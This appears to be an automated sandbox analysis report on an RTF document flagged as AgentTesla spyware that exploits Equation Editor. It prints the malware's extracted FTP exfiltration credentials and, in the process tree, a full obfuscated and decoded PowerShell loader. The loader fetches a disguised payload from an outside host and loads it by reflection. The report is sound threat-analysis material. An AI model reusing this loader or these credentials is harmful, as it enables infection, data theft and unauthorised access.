Overview

overview

10

Static

static

1

morningwor...at.rtf

windows7-x64

10

morningwor...at.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    25-04-2024 09:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    morningworkingforgetbackwithentireprocessgetmebacktomesheisverydetailedinprojectgetunderstand___sheisverybeautifulsheisgreat.rtf

  • Size

    69KB

  • MD5

    bd7a9eba72d2a2a8cc97260ec906b842

  • SHA1

    ecf9f969b5f2b687aaf73c6173807cdaad151adb

  • SHA256

    6dd61f18a3cd350daf98d26c0ce32c935fae9a5458ee6e0d8f9fa843be227e02

  • SHA512

    8eb5705bba4a86df8b08d3c9b7db67fa382541469905e3196c5d95f02ab77da5bfc60ba2316ae3c9102190bbf8bf09fd642889916a68c4d0452f4f911177ee69

  • SSDEEP

    1536:7LPx4QfgceatqBb1NTaYIjlQYYmatL6ZDngEaSa7XYtHoylWg3HK:7LZ4QoTatqBb1NTaYIRjyL6ZbhaSarYy

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    =A+N^@~c]~#I

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 10 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\morningworkingforgetbackwithentireprocessgetmebacktomesheisverydetailedinprojectgetunderstand___sheisverybeautifulsheisgreat.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2140
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js"
        2⤵
        • Blocklisted process makes network request
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc3My84MTIvb3JpZ2luYWwvanMuanBnPzE3MTM4ODI3NzgnLCAnaHR0cHM6Ly91cGxvYWRkZWltYWdlbnMuY29tLmJyL2ltYWdlcy8wMDQvNzczLzgxMi9vcmlnaW5hbC9qcy5qcGc/MTcxMzg4Mjc3OCcpOyAkaW1hZ2VCeXRlcyA9IERvd25sb2FkRGF0YUZyb21MaW5rcyAkbGlua3M7IGlmICgkaW1hZ2VCeXRlcyAtbmUgJG51bGwpIHsgJGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbWFnZUJ5dGVzKTsgJHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzsgJGVuZEZsYWcgPSAnPDxCQVNFNjRfRU5EPj4nOyAkc3RhcnRJbmRleCA9ICRpbWFnZVRleHQuSW5kZXhPZigkc3RhcnRGbGFnKTsgJGVuZEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRlbmRGbGFnKTsgaWYgKCRzdGFydEluZGV4IC1nZSAwIC1hbmQgJGVuZEluZGV4IC1ndCAkc3RhcnRJbmRleCkgeyAkc3RhcnRJbmRleCArPSAkc3RhcnRGbGFnLkxlbmd0aDsgJGJhc2U2NExlbmd0aCA9ICRlbmRJbmRleCAtICRzdGFydEluZGV4OyAkYmFzZTY0Q29tbWFuZCA9ICRpbWFnZVRleHQuU3Vic3RyaW5nKCRzdGFydEluZGV4LCAkYmFzZTY0TGVuZ3RoKTsgJGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2U2NENvbW1hbmQpOyAkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjb21tYW5kQnl0ZXMpOyAkdHlwZSA9ICRsb2FkZWRBc3NlbWJseS5HZXRUeXBlKCdQUk9KRVRPQVVUT01BQ0FPLlZCLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LjQ0NDQ2ZXphYi83Ny4wNi41OS4zMi8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1864

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      26166f57a86a4b9bd96ad668513d420c

      SHA1

      b72df8743676284d569eaf7ea1ff5e94e52750ab

      SHA256

      b7aa5fc66ddebf1fff44883df64daf40c0f80b336e4208a753c262649265916b

      SHA512

      86a17b6bb77621bc7206b5d883ccfc91b9120a335c6f84249f18b589937ca01f2b239199e37b42bba9d8353f0427b41a3c7805aaaac06f33078ad3a9bf97407f

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      242B

      MD5

      3d7b7518da419480f20c8c0ea0f05972

      SHA1

      96f0e1c384197edf840909d6e7652774a2d55a24

      SHA256

      5dea024d22df548e2e966350c07f3d8427fec4251e4d7bba6fdfec29157a7575

      SHA512

      a64bca3277b707a930f211c5de0db70ae687775b95857154fa318884894b9189418fc87e507350d44159f8752ea1a83f780eb6656ed0f88370d310ab9c42a302

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar1D03.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      746c382c55860ed4de2c6c6ffb359463

      SHA1

      9887af848d747f6efb8ea2a934484aebcb00cc5c

      SHA256

      f9a7b1371eb0d7d388879ad381c433232000c4b4f12cbf7877fbb9308ce2bb13

      SHA512

      dba6949a3a0ecc469ecf19a414629ccd305eb8e58a3d95723afc91d7f56d6907c23148e86a9a95d8c59dbe4c14153ec238d107fe459e59466c2dfde21d56742b

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js
      Filesize

      5KB

      MD5

      8cf579f458819a211f06d8d115980db4

      SHA1

      07a073341bb83d3ca8bd3ce21edaa5c3e631087a

      SHA256

      65545c87941558733f8e159addc75b5f17e2597e05af3055a708fd49a6164f91

      SHA512

      5fd3280406cc5e4c72209ea9712ee905e27b7804dd56c80ae1c33896a837c517a43485658be3095926457a35000d7f5521d6711092b8ebdaf948cbb5308bd7d6

      Download Submit
    • memory/768-56-0x0000000002B60000-0x0000000002BA0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/768-55-0x0000000002B60000-0x0000000002BA0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/768-54-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/768-168-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/768-53-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1864-156-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1864-152-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1864-172-0x00000000049B0000-0x00000000049F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1864-171-0x0000000067260000-0x000000006794E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1864-170-0x00000000049B0000-0x00000000049F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1864-169-0x0000000067260000-0x000000006794E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1864-159-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1864-157-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1864-163-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1864-161-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1864-154-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1864-165-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/2136-0-0x000000002FF21000-0x000000002FF22000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2136-167-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2136-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2136-2-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2960-63-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2960-166-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2960-62-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2960-64-0x0000000002AB0000-0x0000000002AF0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2960-65-0x0000000002AB0000-0x0000000002AF0000-memory.dmp
      Filesize

      256KB

      Download